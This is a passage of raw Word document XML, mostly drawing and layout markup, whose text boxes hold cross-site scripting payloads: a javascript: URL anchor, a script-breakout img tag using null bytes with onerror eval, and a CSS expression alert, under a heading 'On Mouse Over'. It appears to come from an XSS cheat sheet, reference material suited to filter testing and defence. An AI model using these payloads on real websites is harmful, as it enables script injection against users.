                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,3046730;13335,3046730;11430,3046730;0,3033395;0,3029585;13335,3016250;17780,3016250;31115,3031490;31115,3033395;17780,304673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4793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2969895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2291715" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="95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1715" cy="116205"/>
                          <a:chOff x="1930" y="4677"/>
                          <a:chExt cx="3609" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="96" name="Freeform 98"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="4676"/>
                            <a:ext cx="3609" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5518 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3609"/>
                              <a:gd name="T2" fmla="+- 0 4859 4677"/>
                              <a:gd name="T3" fmla="*/ 4859 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3609"/>
                              <a:gd name="T6" fmla="+- 0 4859 4677"/>
                              <a:gd name="T7" fmla="*/ 4859 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3609"/>
                              <a:gd name="T10" fmla="+- 0 4858 4677"/>
                              <a:gd name="T11" fmla="*/ 4858 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3609"/>
                              <a:gd name="T14" fmla="+- 0 4838 4677"/>
                              <a:gd name="T15" fmla="*/ 4838 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 3609"/>
                              <a:gd name="T18" fmla="+- 0 4835 4677"/>
                              <a:gd name="T19" fmla="*/ 4835 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 3609"/>
                              <a:gd name="T22" fmla="+- 0 4698 4677"/>
                              <a:gd name="T23" fmla="*/ 4698 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 3609"/>
                              <a:gd name="T26" fmla="+- 0 4677 4677"/>
                              <a:gd name="T27" fmla="*/ 4677 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5518 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 3609"/>
                              <a:gd name="T30" fmla="+- 0 4677 4677"/>
                              <a:gd name="T31" fmla="*/ 4677 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5539 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 3609"/>
                              <a:gd name="T34" fmla="+- 0 4698 4677"/>
                              <a:gd name="T35" fmla="*/ 4698 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5539 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 3609"/>
                              <a:gd name="T38" fmla="+- 0 4838 4677"/>
                              <a:gd name="T39" fmla="*/ 4838 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5521 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 3609"/>
                              <a:gd name="T42" fmla="+- 0 4858 4677"/>
                              <a:gd name="T43" fmla="*/ 4858 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5518 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 3609"/>
                              <a:gd name="T46" fmla="+- 0 4859 4677"/>
                              <a:gd name="T47" fmla="*/ 485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609" h="183">
                                <a:moveTo>
                                  <a:pt x="358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588" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3591" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="358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4676"/>
                            <a:ext cx="360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&lt;form&gt;&lt;a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7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href="javascript:\u0061lert(1)"&gt;X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6" o:spid="_x0000_s2232" style="position:absolute;margin-left:96.5pt;margin-top:233.85pt;width:180.45pt;height:9.15pt;z-index:-15468544;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,4677" coordsize="360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">
                <v:shape id="Freeform 98" o:spid="_x0000_s2233" style="position:absolute;left:1930;top:4676;width:3609;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="360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N/GcUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE74LfITxhb5rWg6zVKOIfWIQ9WF1Yb4/m&#10;2Vabl9JE7e6nN4LgcZiZ3zDTeWsqcaPGlZYVxIMIBHFmdcm5gsN+0/8E4TyyxsoyKfgjB/NZtzPF&#10;RNs77+iW+lwECLsEFRTe14mULivIoBvYmjh4J9sY9EE2udQN3gPcVHIYRSNpsOSwUGBNy4KyS3o1&#10;Co4xn9fx//bXpma7+q7q9c9idVHqo9cuJiA8tf4dfrW/tILxCJ5fwg+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I38ZxQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3588,182l21,182r-3,-1l,161r,-3l,21,21,,3588,r21,21l3609,161r-18,20l3588,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3588,4859;21,4859;18,4858;0,4838;0,4835;0,4698;21,4677;3588,4677;3609,4698;3609,4838;3591,4858;3588,4859" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 97" o:spid="_x0000_s2234" type="#_x0000_t202" style="position:absolute;left:1930;top:4676;width:360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M5mc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tIP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DOZnEAAAA2w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&lt;form&gt;&lt;a</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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href="javascript:\u0061lert(1)"&gt;X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4844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3232150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="94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5138 5090"/>
                            <a:gd name="T3" fmla="*/ 5138 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 5138 5090"/>
                            <a:gd name="T7" fmla="*/ 5138 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 5138 5090"/>
                            <a:gd name="T11" fmla="*/ 5138 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 5117 5090"/>
                            <a:gd name="T15" fmla="*/ 5117 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 5111 5090"/>
                            <a:gd name="T19" fmla="*/ 5111 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 5090 5090"/>
                            <a:gd name="T23" fmla="*/ 5090 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 5090 5090"/>
                            <a:gd name="T27" fmla="*/ 5090 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 5114 5090"/>
                            <a:gd name="T31" fmla="*/ 5114 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 5117 5090"/>
                            <a:gd name="T35" fmla="*/ 5117 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 5138 5090"/>
                            <a:gd name="T39" fmla="*/ 5138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468BA" id="Freeform 95" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:254.5pt;width:2.45pt;height:2.45pt;z-index:-15468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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,3262630;13335,3262630;11430,3262630;0,3249295;0,3245485;13335,3232150;17780,3232150;31115,3247390;31115,3249295;17780,326263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4896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3185795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4320540" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="91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0540" cy="116205"/>
                          <a:chOff x="1930" y="5017"/>
                          <a:chExt cx="6804" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="92" name="Freeform 94"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="5017"/>
                            <a:ext cx="6804" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8713 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 6804"/>
                              <a:gd name="T2" fmla="+- 0 5199 5017"/>
                              <a:gd name="T3" fmla="*/ 5199 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 6804"/>
                              <a:gd name="T6" fmla="+- 0 5199 5017"/>
                              <a:gd name="T7" fmla="*/ 5199 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 6804"/>
                              <a:gd name="T10" fmla="+- 0 5199 5017"/>
                              <a:gd name="T11" fmla="*/ 5199 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 6804"/>
                              <a:gd name="T14" fmla="+- 0 5178 5017"/>
                              <a:gd name="T15" fmla="*/ 5178 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 6804"/>
                              <a:gd name="T18" fmla="+- 0 5175 5017"/>
                              <a:gd name="T19" fmla="*/ 5175 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 6804"/>
                              <a:gd name="T22" fmla="+- 0 5038 5017"/>
                              <a:gd name="T23" fmla="*/ 5038 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 6804"/>
                              <a:gd name="T26" fmla="+- 0 5017 5017"/>
                              <a:gd name="T27" fmla="*/ 5017 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8713 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 6804"/>
                              <a:gd name="T30" fmla="+- 0 5017 5017"/>
                              <a:gd name="T31" fmla="*/ 5017 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8734 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 6804"/>
                              <a:gd name="T34" fmla="+- 0 5038 5017"/>
                              <a:gd name="T35" fmla="*/ 5038 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8734 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 6804"/>
                              <a:gd name="T38" fmla="+- 0 5178 5017"/>
                              <a:gd name="T39" fmla="*/ 5178 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8716 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 6804"/>
                              <a:gd name="T42" fmla="+- 0 5199 5017"/>
                              <a:gd name="T43" fmla="*/ 5199 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8713 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 6804"/>
                              <a:gd name="T46" fmla="+- 0 5199 5017"/>
                              <a:gd name="T47" fmla="*/ 519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804" h="183">
                                <a:moveTo>
                                  <a:pt x="6783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6783" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6804" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6804" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6786" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="678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017"/>
                            <a:ext cx="680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&lt;/script&gt;&lt;img/*%00/src="worksinchrome&amp;colon;prompt(1)"/%00*/onerror='eval(src)'&gt;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2235" style="position:absolute;margin-left:96.5pt;margin-top:250.85pt;width:340.2pt;height:9.15pt;z-index:-15467520;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,5017" coordsize="680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">
                <v:shape id="Freeform 94" o:spid="_x0000_s2236" style="position:absolute;left:1930;top:5017;width:6804;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="680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9EdMMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2sCMRTE7wW/Q3iCt5rVg9jVKCIoxUvrn4u3x+a5&#10;Wdy8rEm67n77piD0OMzMb5jlurO1aMmHyrGCyTgDQVw4XXGp4HLevc9BhIissXZMCnoKsF4N3paY&#10;a/fkI7WnWIoE4ZCjAhNjk0sZCkMWw9g1xMm7OW8xJulLqT0+E9zWcpplM2mx4rRgsKGtoeJ++rEK&#10;qoufFdH0rdbf/UPPJ7fr/vCl1GjYbRYgInXxP/xqf2oFH1P4+5J+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9EdMMAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m6783,182l21,182r-3,l,161r,-3l,21,21,,6783,r21,21l6804,161r-18,21l6783,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6783,5199;21,5199;18,5199;0,5178;0,5175;0,5038;21,5017;6783,5017;6804,5038;6804,5178;6786,5199;6783,5199" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 93" o:spid="_x0000_s2237" type="#_x0000_t202" style="position:absolute;left:1930;top:5017;width:680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g/m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g/msMAAADb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&lt;/script&gt;&lt;img/*%00/src="worksinchrome&amp;colon;prompt(1)"/%00*/onerror='eval(src)'&gt;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4947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3455670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="90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5491 5442"/>
                            <a:gd name="T3" fmla="*/ 5491 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 5491 5442"/>
                            <a:gd name="T7" fmla="*/ 5491 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 5490 5442"/>
                            <a:gd name="T11" fmla="*/ 5490 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 5470 5442"/>
                            <a:gd name="T15" fmla="*/ 5470 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 5463 5442"/>
                            <a:gd name="T19" fmla="*/ 5463 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 5442 5442"/>
                            <a:gd name="T23" fmla="*/ 5442 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 5442 5442"/>
                            <a:gd name="T27" fmla="*/ 5442 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 5467 5442"/>
                            <a:gd name="T31" fmla="*/ 5467 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 5470 5442"/>
                            <a:gd name="T35" fmla="*/ 5470 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 5491 5442"/>
                            <a:gd name="T39" fmla="*/ 549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E8B6E" id="Freeform 91" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:272.1pt;width:2.45pt;height:2.45pt;z-index:-15467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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,3486785;13335,3486785;11430,3486150;0,3473450;0,3469005;13335,3455670;17780,3455670;31115,3471545;31115,3473450;17780,348678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4998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3409315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2986405" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="87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6405" cy="116205"/>
                          <a:chOff x="1930" y="5369"/>
                          <a:chExt cx="4703" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="88" name="Freeform 90"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="5369"/>
                            <a:ext cx="4703" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6611 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 4703"/>
                              <a:gd name="T2" fmla="+- 0 5552 5369"/>
                              <a:gd name="T3" fmla="*/ 5552 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 4703"/>
                              <a:gd name="T6" fmla="+- 0 5552 5369"/>
                              <a:gd name="T7" fmla="*/ 5552 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 4703"/>
                              <a:gd name="T10" fmla="+- 0 5551 5369"/>
                              <a:gd name="T11" fmla="*/ 5551 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 4703"/>
                              <a:gd name="T14" fmla="+- 0 5531 5369"/>
                              <a:gd name="T15" fmla="*/ 5531 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 4703"/>
                              <a:gd name="T18" fmla="+- 0 5527 5369"/>
                              <a:gd name="T19" fmla="*/ 5527 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 4703"/>
                              <a:gd name="T22" fmla="+- 0 5390 5369"/>
                              <a:gd name="T23" fmla="*/ 5390 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 4703"/>
                              <a:gd name="T26" fmla="+- 0 5369 5369"/>
                              <a:gd name="T27" fmla="*/ 5369 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6611 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 4703"/>
                              <a:gd name="T30" fmla="+- 0 5369 5369"/>
                              <a:gd name="T31" fmla="*/ 5369 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6632 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 4703"/>
                              <a:gd name="T34" fmla="+- 0 5390 5369"/>
                              <a:gd name="T35" fmla="*/ 5390 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6632 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 4703"/>
                              <a:gd name="T38" fmla="+- 0 5531 5369"/>
                              <a:gd name="T39" fmla="*/ 5531 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6614 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 4703"/>
                              <a:gd name="T42" fmla="+- 0 5551 5369"/>
                              <a:gd name="T43" fmla="*/ 5551 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6611 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 4703"/>
                              <a:gd name="T46" fmla="+- 0 5552 5369"/>
                              <a:gd name="T47" fmla="*/ 555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03" h="183">
                                <a:moveTo>
                                  <a:pt x="4681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681" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4702" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4702" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4684" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="468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369"/>
                            <a:ext cx="470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&lt;style&gt;//*{x:expression(alert(/xss/))}//&lt;style&gt;&lt;/style&gt;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8" o:spid="_x0000_s2238" style="position:absolute;margin-left:96.5pt;margin-top:268.45pt;width:235.15pt;height:9.15pt;z-index:-15466496;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,5369" coordsize="4703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">
                <v:shape id="Freeform 90" o:spid="_x0000_s2239" style="position:absolute;left:1930;top:5369;width:4703;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4703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P5O8EA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/sfwhN209TBqqvGMgYr81KwOs+P5tkU&#10;m5fSZNr51y+HgceP7/cmH20nrjT41rGCxTwBQVw73XKj4Hj4nK1A+ICssXNMCn7JQ759mmww0+7G&#10;e7pWoRExhH2GCkwIfSalrw1Z9HPXE0fu7AaLIcKhkXrAWwy3nXxJklRabDk2GOzpw1B9qX6sgnpX&#10;LpZl8WoO5/39LfX9SVbfhVLP0/F9DSLQGB7if/eXVrCKY+OX+AP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j+TvBAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m4681,183l21,183r-3,-1l,162r,-4l,21,21,,4681,r21,21l4702,162r-18,20l4681,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4681,5552;21,5552;18,5551;0,5531;0,5527;0,5390;21,5369;4681,5369;4702,5390;4702,5531;4684,5551;4681,5552" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 89" o:spid="_x0000_s2240" type="#_x0000_t202" style="position:absolute;left:1930;top:5369;width:4703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ercMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE78L+h/CEvWmqB9GuUURWEBYWaz3s8dk8&#10;22DzUpus1n9vBMHjMDPfMPNlZ2txpdYbxwpGwwQEceG04VLBId8MpiB8QNZYOyYFd/KwXHz05phq&#10;d+OMrvtQighhn6KCKoQmldIXFVn0Q9cQR+/kWoshyraUusVbhNtajpNkIi0ajgsVNrSuqDjv/62C&#10;1R9n3+bye9xlp8zk+Szhn8lZqc9+t/oCEagL7/CrvdUKpj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mercMAAADb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&lt;style&gt;//*{x:expression(alert(/xss/))}//&lt;style&gt;&lt;/style&gt;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EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="122"/>
        <w:ind w:left="464"/>
      </w:pPr>
      <w:r>
        <w:t>On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Mouse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Over</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr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5049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152400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="86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89 240"/>
                            <a:gd name="T3" fmla="*/ 289 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 289 240"/>
                            <a:gd name="T7" fmla="*/ 289 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 288 240"/>
                            <a:gd name="T11" fmla="*/ 288 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 268 240"/>
                            <a:gd name="T15" fmla="*/ 268 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 261 240"/>
                            <a:gd name="T19" fmla="*/ 261 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 240 240"/>
                            <a:gd name="T23" fmla="*/ 240 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 240 240"/>
                            <a:gd name="T27" fmla="*/ 240 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 264 240"/>
                            <a:gd name="T31" fmla="*/ 264 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 268 240"/>
                            <a:gd name="T35" fmla="*/ 268 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 289 240"/>
                            <a:gd name="T39" fmla="*/ 28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D964D" id="Freeform 87" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:12pt;width:2.45pt;height:2.45pt;z-index:-15465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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,183515;13335,183515;11430,182880;0,170180;0,165735;13335,152400;17780,152400;31115,167640;31115,170180;17780,18351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5100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2507615" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="83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7615" cy="116205"/>
                          <a:chOff x="1930" y="167"/>
                          <a:chExt cx="3949" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="84" name="Freeform 86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3949" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5858 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 3949"/>
                              <a:gd name="T2" fmla="+- 0 350 167"/>
                              <a:gd name="T3" fmla="*/ 350 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 3949"/>
                              <a:gd name="T6" fmla="+- 0 350 167"/>
                              <a:gd name="T7" fmla="*/ 350 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 3949"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 3949"/>
